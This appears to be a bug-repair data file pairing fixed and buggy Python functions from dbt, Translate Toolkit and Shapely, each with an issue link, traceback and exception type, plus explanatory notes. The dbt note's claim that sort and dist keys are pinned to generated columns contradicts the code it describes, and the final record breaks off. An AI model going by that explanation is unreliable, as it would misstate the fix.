def execute_archive(profile, node, context):
adapter = get_adapter(profile)
node_cfg = node.get("config", {})
source_columns = adapter.get_columns_in_table(
profile, node_cfg.get("source_schema"), node_cfg.get("source_table")
)
if len(source_columns) == 0:
raise RuntimeError(
'Source table "{}"."{}" does not exist'.format(source_schema, source_table)
)
dest_columns = source_columns + [
dbt.schema.Column("valid_from", "timestamp", None),
dbt.schema.Column("valid_to", "timestamp", None),
dbt.schema.Column("scd_id", "text", None),
dbt.schema.Column("dbt_updated_at", "timestamp", None),
]
adapter.create_table(
profile,
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
columns=dest_columns,
sort=node_cfg.get("updated_at"),
dist=node_cfg.get("unique_key"),
)
# TODO move this to inject_runtime_config, generate archive SQL
# in wrap step. can't do this right now because we actually need
# to inspect status of the schema at runtime and archive requires
# a lot of information about the schema to generate queries.
template_ctx = context.copy()
template_ctx.update(node_cfg)
select = dbt.clients.jinja.get_rendered(
dbt.templates.SCDArchiveTemplate, template_ctx
)
insert_stmt = dbt.templates.ArchiveInsertTemplate().wrap(
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
query=select,
unique_key=node_cfg.get("unique_key"),
)
node["wrapped_sql"] = dbt.clients.jinja.get_rendered(insert_stmt, template_ctx)
result = adapter.execute_model(profile=profile, model=node)
return result
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
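
The operative change in `execute_archive` is that the target table's sort and dist keys are pinned to the dbt-generated `dbt_updated_at` and `scd_id` columns, which are guaranteed to exist, instead of the user-configured `updated_at` / `unique_key`, which may be an SQL expression (like the concatenated key in the traceback) rather than a real column. A sketch of the resulting invariant (hypothetical helper, not dbt's API):

def archive_create_kwargs(node_cfg):
    # sort/dist always name dbt-managed columns added to dest_columns,
    # so the warehouse never sees an expression used as a dist/sort key.
    return {
        "schema": node_cfg["target_schema"],
        "table": node_cfg["target_table"],
        "sort": "dbt_updated_at",
        "dist": "scd_id",
    }

print(archive_create_kwargs({"target_schema": "archive", "target_table": "accounts"}))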
|
def do_compile(self):
schema_tests = []
for model_name, constraint_blob in self.schema.items():
constraints = constraint_blob.get("constraints", {})
for constraint_type, constraint_data in constraints.items():
if constraint_data is None:
compiler_error(
self,
"no constraints given to test: '{}.{}'".format(
model_name, constraint_type
),
)
for params in constraint_data:
schema_test_klass = self.get_test(constraint_type)
schema_test = schema_test_klass(
self.project,
self.og_target_dir,
self.rel_filepath,
model_name,
params,
)
schema_tests.append(schema_test)
return schema_tests
|
def do_compile(self):
schema_tests = []
for model_name, constraint_blob in self.schema.items():
constraints = constraint_blob.get("constraints", {})
for constraint_type, constraint_data in constraints.items():
for params in constraint_data:
schema_test_klass = self.get_test(constraint_type)
schema_test = schema_test_klass(
self.project,
self.og_target_dir,
self.rel_filepath,
model_name,
params,
)
schema_tests.append(schema_test)
return schema_tests
|
https://github.com/fishtown-analytics/dbt/issues/240
|
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 41, in main
handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 143, in handle
task.run()
File "/Users/tristan/dev/dbt/dbt/task/run.py", line 28, in run
graph_type = self.compile()
File "/Users/tristan/dev/dbt/dbt/task/run.py", line 20, in compile
results = compiler.compile(self.args.dry)
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 399, in compile
written_schema_tests = self.compile_schema_tests(linker)
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 324, in compile_schema_tests
schema_tests.extend(schema.compile()) # compiling a SchemaFile returns >= 0 SchemaTest models
File "/Users/tristan/dev/dbt/dbt/model.py", line 556, in compile
for params in constraint_data:
TypeError: 'NoneType' object is not iterable
|
TypeError
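
The fix is a plain None-guard before iterating: a schema.yml entry like `constraints: {unique:}` parses to `{'unique': None}`, and iterating None raises the TypeError above. The same pattern in isolation (assumes PyYAML is installed):

import yaml

blob = yaml.safe_load("constraints:\n  unique:\n")
for constraint_type, constraint_data in blob["constraints"].items():
    if constraint_data is None:
        # Readable message instead of "'NoneType' object is not iterable".
        print("no constraints given to test: '{}'".format(constraint_type))
        continue
    for params in constraint_data:
        print(constraint_type, params)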
|
def dosetup(name, version, packages, datafiles, scripts, ext_modules=[]):
description, long_description = __doc__.split("\n", 1)
kwargs = {}
if py2exe:
kwargs["distclass"] = TranslateDistribution
setup(
name=name,
version=version,
license="GNU General Public License (GPL)",
description=description,
long_description=long_description,
author="Translate",
author_email="translate-devel@lists.sourceforge.net",
url="http://toolkit.translatehouse.org/",
download_url="https://github.com/translate/translate/releases/tag/" + version,
project_urls={
"Issue Tracker": "https://github.com/translate/translate/issues",
"Documentation": "http://docs.translatehouse.org/projects/translate-toolkit/",
},
platforms=["any"],
classifiers=classifiers,
packages=packages,
data_files=datafiles,
entry_points={
"console_scripts": translatescripts,
},
scripts=scripts,
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=parse_requirements("requirements/required.txt"),
**kwargs,
)
|
def dosetup(name, version, packages, datafiles, scripts, ext_modules=[]):
from setuptools import setup
description, long_description = __doc__.split("\n", 1)
kwargs = {}
if py2exe:
kwargs["distclass"] = TranslateDistribution
setup(
name=name,
version=version,
license="GNU General Public License (GPL)",
description=description,
long_description=long_description,
author="Translate",
author_email="translate-devel@lists.sourceforge.net",
url="http://toolkit.translatehouse.org/",
download_url="https://github.com/translate/translate/releases/tag/" + version,
project_urls={
"Issue Tracker": "https://github.com/translate/translate/issues",
"Documentation": "http://docs.translatehouse.org/projects/translate-toolkit/",
},
platforms=["any"],
classifiers=classifiers,
packages=packages,
data_files=datafiles,
entry_points={
"console_scripts": translatescripts,
},
scripts=scripts,
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=parse_requirements("requirements/required.txt"),
**kwargs,
)
|
https://github.com/translate/translate/issues/3958
|
Traceback (most recent call last):
File "setup.py", line 526, in <module>
standardsetup("translate-toolkit", translateversion)
File "setup.py", line 486, in standardsetup
translatebashscripts)
File "setup.py", line 490, in dosetup
from setuptools import setup
File "C:\Python27\lib\site-packages\setuptools\__init__.py", line 20, in <module>
from setuptools.dist import Distribution, Feature
File "C:\Python27\lib\site-packages\setuptools\dist.py", line 336, in <module>
_Distribution = get_unpatched(distutils.core.Distribution)
File "C:\Python27\lib\site-packages\setuptools\monkey.py", line 44, in get_unpatched
return lookup(item)
File "C:\Python27\lib\site-packages\setuptools\monkey.py", line 61, in get_unpatched_class
raise AssertionError(msg)
AssertionError: distutils has already been patched by <class py2exe.Distribution at 0x047BBF48>
|
AssertionError
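
The diff drops the function-local `from setuptools import setup`: by the time `dosetup` runs, py2exe has already monkey-patched `distutils.core.Distribution`, and importing setuptools at that point trips its `get_unpatched` assertion. Binding `setup` at module import time sidesteps the ordering problem. A sketch of the constraint (py2exe is optional, hence the guard):

from setuptools import setup  # must be imported before py2exe patches distutils

try:
    import py2exe  # noqa: F401  # patches distutils.core.Distribution on import
except ImportError:
    py2exe = None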
|
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.seek(0, 0)
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
|
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.reset()
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
|
https://github.com/translate/translate/issues/3419
|
$ pot2po --errorlevel=traceback -t af templates af
pot2po: WARNING: writing to temporary output... 9%
pot2po: WARNING: Error processing: input templates/browser/chrome/overrides/appstrings.properties.pot, output af/browser/chrome/overrides/appstrings.properties.po, template af/browser/chrome/overrides/appstrings.properties.po: Traceback (most recent call last):
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 508, in recursiveprocess
fulltemplatepath)
File "/Users/dwayne/dev/toolkit/translate/convert/convert.py", line 179, in processfile
fulltemplatepath)
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 568, in processfile
fulloutputpath)
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 535, in finalizetempoutputfile
outputfile.reset()
AttributeError: '_io.BytesIO' object has no attribute 'reset'
|
AttributeError
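
`reset()` existed on Python 2's StringIO/cStringIO objects but was never part of the `io` classes, so under Python 3 the temp output file (an `io.BytesIO`) has no such method. `seek(0, 0)` is the portable rewind:

import io

buf = io.BytesIO()
buf.write(b"converted output")
buf.seek(0, 0)      # rewind; io objects have no .reset()
print(buf.read())   # b'converted output'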
|
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
Rings are implicitly closed. There is no need to specify a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
|
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
Rings are implicitly closed. There is no need to specify a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
|
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
self._geom, self._ndim = ret
else:
self.empty()
|
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
self._geom, self._ndim = ret
else:
self.empty()
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
|
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # Iterators, e.g. Python 3 zip
ob = list(ob)
m = len(ob)
if m == 0:
return None
def _coords(o):
if isinstance(o, Point):
return o.coords[0]
else:
return o
n = len(_coords(ob[0]))
if m < 3:
raise ValueError("A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Add closing coordinates if not provided
if (
m == 3
or _coords(ob[0])[0] != _coords(ob[-1])[0]
or _coords(ob[0])[1] != _coords(ob[-1])[1]
):
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim)
)
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = _coords(ob[i])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = _coords(ob[0])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M - 1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M - 1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M - 1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
|
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # Iterators, e.g. Python 3 zip
ob = list(ob)
m = len(ob)
if m == 0:
return None
n = len(ob[0])
if m < 3:
raise ValueError("A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Add closing coordinates if not provided
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim)
)
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = ob[i]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = ob[0]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M - 1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M - 1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M - 1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
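
The heart of this fix is the `_coords` normalizer: a shapely `Point` has no `len()`, so every ring element is first coerced to a plain coordinate tuple before `len()` and indexing are applied. The same idea in isolation, with a stand-in Point class so the sketch runs without shapely:

class Point:  # stand-in for shapely.geometry.Point in this sketch
    def __init__(self, *xy):
        self.coords = [tuple(xy)]

def _coords(o):
    """Return a plain (x, y[, z]) tuple whether o is a Point or a tuple."""
    return o.coords[0] if isinstance(o, Point) else o

ring = [Point(0, 0), (0, 1), Point(1, 1), (1, 0)]
print([_coords(o) for o in ring])  # [(0, 0), (0, 1), (1, 1), (1, 0)]
print(len(_coords(ring[0])))       # 2 -- len(ring[0]) itself would TypeError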
|
def bounds(self):
"""Returns minimum bounding region (minx, miny, maxx, maxy)"""
try:
xy = self.coords[0]
except IndexError:
return ()
return (xy[0], xy[1], xy[0], xy[1])
|
def bounds(self):
xy = self.coords[0]
return (xy[0], xy[1], xy[0], xy[1])
|
https://github.com/Toblerity/Shapely/issues/716
|
In [51]: Point().bounds
---------------------------------------------------------------------------
IndexError Traceback (most recent call last)
<ipython-input-51-6ed8561bf72c> in <module>
----> 1 Point().bounds
~/miniconda3/envs/dev37/lib/python3.7/site-packages/shapely/geometry/point.py in bounds(self)
120 @property
121 def bounds(self):
--> 122 xy = self.coords[0]
123 return (xy[0], xy[1], xy[0], xy[1])
124
IndexError: list index out of range
|
IndexError
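
The merged `bounds` turns the IndexError on an empty geometry into an empty tuple. The pattern in isolation:

def bounds(coords):
    """Minimum bounding region (minx, miny, maxx, maxy); () when empty."""
    try:
        xy = coords[0]
    except IndexError:
        return ()
    return (xy[0], xy[1], xy[0], xy[1])

print(bounds([]))        # ()
print(bounds([(2, 3)]))  # (2, 3, 2, 3)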
|
def _split_line_with_point(line, splitter):
"""Split a LineString with a Point"""
assert isinstance(line, LineString)
assert isinstance(splitter, Point)
# check if point is in the interior of the line
if not line.relate_pattern(splitter, "0********"):
# point not on line interior --> return collection with single identity line
# (REASONING: Returning a list with the input line reference and creating a
# GeometryCollection at the general split function prevents unnecessary copying
# of linestrings in multipoint splitting function)
return [line]
elif line.coords[0] == splitter.coords[0]:
# if line is a closed ring the previous test doesn't behave as desired
return [line]
# point is on line, get the distance from the first point on line
distance_on_line = line.project(splitter)
coords = list(line.coords)
# split the line at the point and create two new lines
current_position = 0.0
for i in range(len(coords) - 1):
point1 = coords[i]
point2 = coords[i + 1]
dx = point1[0] - point2[0]
dy = point1[1] - point2[1]
segment_length = (dx**2 + dy**2) ** 0.5
current_position += segment_length
if distance_on_line == current_position:
# splitter is exactly on a vertex
return [LineString(coords[: i + 2]), LineString(coords[i + 1 :])]
elif distance_on_line < current_position:
# splitter is between two vertices
return [
LineString(coords[: i + 1] + [splitter.coords[0]]),
LineString([splitter.coords[0]] + coords[i + 1 :]),
]
return [line]
|
def _split_line_with_point(line, splitter):
"""Split a LineString with a Point"""
assert isinstance(line, LineString)
assert isinstance(splitter, Point)
# check if point is in the interior of the line
if not line.relate_pattern(splitter, "0********"):
# point not on line interior --> return collection with single identity line
# (REASONING: Returning a list with the input line reference and creating a
# GeometryCollection at the general split function prevents unnecessary copying
# of linestrings in multipoint splitting function)
return [line]
elif line.coords[0] == splitter.coords[0]:
# if line is a closed ring the previous test doesn't behave as desired
return [line]
# point is on line, get the distance from the first point on line
distance_on_line = line.project(splitter)
coords = list(line.coords)
# split the line at the point and create two new lines
# TODO: can optimize this by accumulating the computed point-to-point distances
for i, p in enumerate(coords):
pd = line.project(Point(p))
if pd == distance_on_line:
return [LineString(coords[: i + 1]), LineString(coords[i:])]
elif distance_on_line < pd:
# we must interpolate here because the line might use 3D points
cp = line.interpolate(distance_on_line)
ls1_coords = coords[:i]
ls1_coords.append(cp.coords[0])
ls2_coords = [cp.coords[0]]
ls2_coords.extend(coords[i:])
return [LineString(ls1_coords), LineString(ls2_coords)]
|
https://github.com/Toblerity/Shapely/issues/585
|
Traceback (most recent call last):
File "t_test.py", line 8, in <module>
split(line, multi_point)
File "/home/lihongyuan02/.pyenv/versions/3.6.5/lib/python3.6/site-packages/shapely/ops.py", line 474, in split
return GeometryCollection(split_func(geom, splitter))
File "/home/lihongyuan02/.pyenv/versions/3.6.5/lib/python3.6/site-packages/shapely/ops.py", line 416, in _split_line_with_multipoint
new_chunks.extend(SplitOp._split_line_with_point(chunk, pt))
TypeError: 'NoneType' object is not iterable
|
TypeError
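A small exercise of the fixed code path, assuming a Shapely build that includes this change. The key difference is the accumulated-distance walk with a final "return [line]" fallback, so the helper can no longer fall off the end of the loop and hand None to the multipoint splitter:

from shapely.geometry import LineString, MultiPoint
from shapely.ops import split

line = LineString([(0, 0), (1, 1), (2, 2)])
# Splitting at an interior vertex yields two pieces, never None.
pieces = list(split(line, MultiPoint([(1, 1)])).geoms)
assert len(pieces) == 2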
|
def _geom(self):
"""Keeps the GEOS geometry in synch with the context."""
gtag = self.gtag()
if gtag != self._gtag or self._is_empty:
self.empty()
if len(self.context) > 0:
self.__geom__, n = self.factory(self.context)
self._gtag = gtag
return self.__geom__
|
def _geom(self):
"""Keeps the GEOS geometry in synch with the context."""
gtag = self.gtag()
if gtag != self._gtag or self._is_empty:
self.empty()
self.__geom__, n = self.factory(self.context)
self._gtag = gtag
return self.__geom__
|
https://github.com/Toblerity/Shapely/issues/542
|
Python 3.6.2 (default, Aug 7 2017, 17:26:39)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-11)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import shapely
>>> shapely.__version__
'1.6.2.post1'
>>> from shapely import geometry
>>> empty_mp = geometry.MultiPolygon()
>>> empty_mp.is_empty
True
>>> empty_json = geometry.mapping(empty_mp)
>>> print(empty_json)
{'type': 'MultiPolygon', 'coordinates': []}
>>> empty_shape = geometry.shape(empty_json)
>>> empty_shape.is_empty
True
>>> empty_asShape = geometry.asShape(empty_json)
>>> empty_asShape.is_empty
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/base.py", line 643, in is_empty
return (self._geom is None) or bool(self.impl['is_empty'](self))
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/proxy.py", line 33, in _geom
self.__geom__, n = self.factory(self.context)
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/multipolygon.py", line 136, in geos_multipolygon_from_py
assert L >= 1
AssertionError
|
AssertionError
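A behavioral check of the guard, assuming shapely 1.x with this fix applied (the asShape adapters were removed in 2.0): adapting an empty MultiPolygon mapping should report is_empty instead of tripping the factory's "assert L >= 1".

from shapely.geometry import asShape

adapted = asShape({"type": "MultiPolygon", "coordinates": []})
assert adapted.is_empty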
|
def __geo_interface__(self):
if not self.exterior:
coords = []
else:
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {"type": "Polygon", "coordinates": tuple(coords)}
|
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {"type": "Polygon", "coordinates": tuple(coords)}
|
https://github.com/Toblerity/Shapely/issues/450
|
>>> import shapely
>>> from shapely import wkt
>>> shapely.__version__
'1.5.17'
>>> pg = wkt.loads('POLYGON EMPTY')
>>> pg.wkt
'POLYGON EMPTY'
>>> pg.__geo_interface__
Runtime error
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Python27\ArcGIS10.5\lib\site-packages\shapely\geometry\polygon.py", line 300, in __geo_interface__
coords = [tuple(self.exterior.coords)]
AttributeError: 'NoneType' object has no attribute 'coords'
|
AttributeError
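With the guard in place (shapely 1.x, where an empty polygon has no exterior ring object), POLYGON EMPTY should map to empty coordinates instead of raising on exterior.coords:

from shapely import wkt

pg = wkt.loads("POLYGON EMPTY")
assert pg.__geo_interface__ == {"type": "Polygon", "coordinates": ()}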
|
def array_interface(self):
"""Provide the Numpy array protocol."""
if self.is_empty:
ai = {"version": 3, "typestr": "<f8", "shape": (0,), "data": (c_double * 0)()}
else:
ai = self.coords.array_interface()
return ai
|
def array_interface(self):
"""Provide the Numpy array protocol."""
return self.coords.array_interface()
|
https://github.com/Toblerity/Shapely/issues/403
|
>>> Point().__array_interface__
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 112, in array_interface
ai = self.array_interface_base
File "/Users/snorf/Desktop/Shapely/shapely/geometry/base.py", line 299, in array_interface_base
'data': self.ctypes,
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 100, in ctypes
array_type = c_double * self._ndim
TypeError: can't multiply sequence by non-int of type 'NoneType'
|
TypeError
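A hedged check of the intended behavior on shapely 1.x, where geometries expose __array_interface__: an empty Point should now convert to a zero-length float array instead of raising.

import numpy as np
from shapely.geometry import Point

assert np.asarray(Point()).shape == (0,)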
|
def array_interface(self):
"""Provide the Numpy array protocol."""
if self.is_empty:
ai = {"version": 3, "typestr": "<f8", "shape": (0,), "data": (c_double * 0)()}
else:
ai = self.array_interface_base
ai.update({"shape": (self._ndim,)})
return ai
|
def array_interface(self):
"""Provide the Numpy array protocol."""
ai = self.array_interface_base
ai.update({"shape": (self._ndim,)})
return ai
|
https://github.com/Toblerity/Shapely/issues/403
|
>>> Point().__array_interface__
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 112, in array_interface
ai = self.array_interface_base
File "/Users/snorf/Desktop/Shapely/shapely/geometry/base.py", line 299, in array_interface_base
'data': self.ctypes,
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 100, in ctypes
array_type = c_double * self._ndim
TypeError: can't multiply sequence by non-int of type 'NoneType'
|
TypeError
|
def __init__(self, dll):
super(LGEOS300, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in keys:
setattr(self, key, getattr(self._lgeos, key))
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.errcheck = errcheck_wkb
self.GEOSGeomToWKT.errcheck = errcheck_just_free
self.GEOSRelate.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
